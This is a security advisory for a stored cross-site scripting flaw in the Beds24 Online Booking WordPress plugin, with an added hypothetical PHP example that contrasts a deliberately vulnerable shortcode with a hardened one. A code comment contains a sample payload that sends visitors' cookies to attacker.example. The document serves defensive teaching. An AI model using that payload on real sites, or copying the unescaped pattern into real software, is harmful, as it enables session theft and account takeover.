Impact
A stored cross-site scripting (XSS) flaw in the Beds24 Online Booking WordPress plugin lets an attacker inject JavaScript into pages the plugin generates. The root cause is improper neutralization of input during page generation: data submitted through the plugin is stored and later rendered without adequate sanitization on save or escaping on output. From the description, an attacker who can plant such input can run arbitrary script in the browser of any visitor to an affected page, and with it read or alter site content as that visitor, capture session data, or perform actions with the victim's privileges. Whether this affects only confidentiality or also integrity and availability of the site depends on what the victim is entitled to do; an administrator viewing the injected page is the worst case.
Affected Systems
Beds24 Online Booking, a WordPress plugin developed by markkinchin, is affected for all releases through 2.0.27.
Risk and Exploitability
A CVSS score of 6.5 places the flaw in the Medium severity band (4.0 to 6.9), and an EPSS score below 1% indicates that, at present, exploitation is unlikely to be widespread or automated. The vulnerability is not listed in the CISA KEV catalog. From the description, the likely attack vector is crafted input submitted through the plugin's configuration or form fields, stored by the plugin, and emitted unescaped on subsequent page loads; the victim must visit a page containing the injected script, the classic stored XSS scenario. Real-world risk therefore depends on who can reach the plugin's data entry points: any account or visitor able to write data that the plugin later displays can plant the payload, so sites that expose those entry points to less-trusted users should treat the issue as significant. Practical checks are to confirm the installed plugin version against 2.0.27, restrict who may edit the plugin's settings and submit booking data until a fixed release is installed, and review stored plugin data for script or event-handler fragments.
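The store-then-render pattern described under Impact and Risk and Exploitability, shown as an added PHP illustration. This is not code from the Beds24 Online Booking plugin, whose source is not on this page; the option name `hypo_booking_settings`, the shortcode tag `hypo_booking`, the field names and the function names are all invented for the example. Only the WordPress API calls (`get_option`, `register_setting`, `sanitize_text_field`, `esc_url_raw`, `wp_kses_post`, `esc_attr`, `esc_url`, `add_shortcode`) are real.

```php
<?php
/*
 * Added example, not the plugin's own code. Option/shortcode/function names
 * beginning with "hypo_" are hypothetical; the WordPress API calls are real.
 */

/*
 * Vulnerable pattern: a value written once through a settings form (or any
 * other data entry point) is echoed raw into every page that renders the
 * shortcode. A stored title such as
 *     "><script>document.location='https://attacker.example/?c='+document.cookie</script>
 * closes the attribute and runs in every visitor's browser.
 */
function hypo_booking_shortcode_vulnerable( $atts ) {
    $settings = get_option( 'hypo_booking_settings', array() );
    $title    = isset( $settings['title'] )      ? $settings['title']      : '';
    $url      = isset( $settings['iframe_url'] ) ? $settings['iframe_url'] : '';

    // No escaping for the attribute or URL context.
    return '<div class="booking" data-title="' . $title . '">'
         . '<iframe src="' . $url . '"></iframe></div>';
}

/*
 * Hardened pattern, part 1: sanitize on save. register_setting() routes every
 * write to the option through this callback, whatever form submitted it.
 */
function hypo_booking_sanitize_settings( $input ) {
    $input = is_array( $input ) ? $input : array();
    $clean = array();
    $clean['title']      = sanitize_text_field( $input['title'] ?? '' );
    // Only https URLs survive; javascript: and data: schemes are dropped.
    $clean['iframe_url'] = esc_url_raw( $input['iframe_url'] ?? '', array( 'https' ) );
    // Free-text blurb: keep post-safe HTML only (no script, no on* handlers).
    $clean['blurb']      = wp_kses_post( $input['blurb'] ?? '' );
    return $clean;
}

function hypo_booking_register_settings() {
    register_setting( 'hypo_booking', 'hypo_booking_settings', array(
        'type'              => 'array',
        'sanitize_callback' => 'hypo_booking_sanitize_settings',
    ) );
}
add_action( 'admin_init', 'hypo_booking_register_settings' );

/*
 * Hardened pattern, part 2: escape on output for the exact context each value
 * lands in. Sanitizing on save is not a substitute: sanitize_text_field()
 * strips tags but leaves quotes, so an unescaped attribute could still be
 * broken out of, and data written by older plugin versions is already stored.
 */
function hypo_booking_shortcode_hardened( $atts ) {
    $settings = get_option( 'hypo_booking_settings', array() );
    $title    = $settings['title']      ?? '';
    $url      = $settings['iframe_url'] ?? '';
    $blurb    = $settings['blurb']      ?? '';

    return '<div class="booking" data-title="' . esc_attr( $title ) . '">'
         . '<p>' . wp_kses_post( $blurb ) . '</p>'
         . '<iframe src="' . esc_url( $url, array( 'https' ) ) . '"></iframe></div>';
}
add_shortcode( 'hypo_booking', 'hypo_booking_shortcode_hardened' );
```

The two halves are deliberately independent: the sanitize callback limits what can be persisted, and the output escaping makes whatever is persisted inert in its HTML context. A fix that only adds one of them leaves either already-stored payloads or quote-based attribute breakouts in place, which is why reviewing existing stored data is part of the remediation.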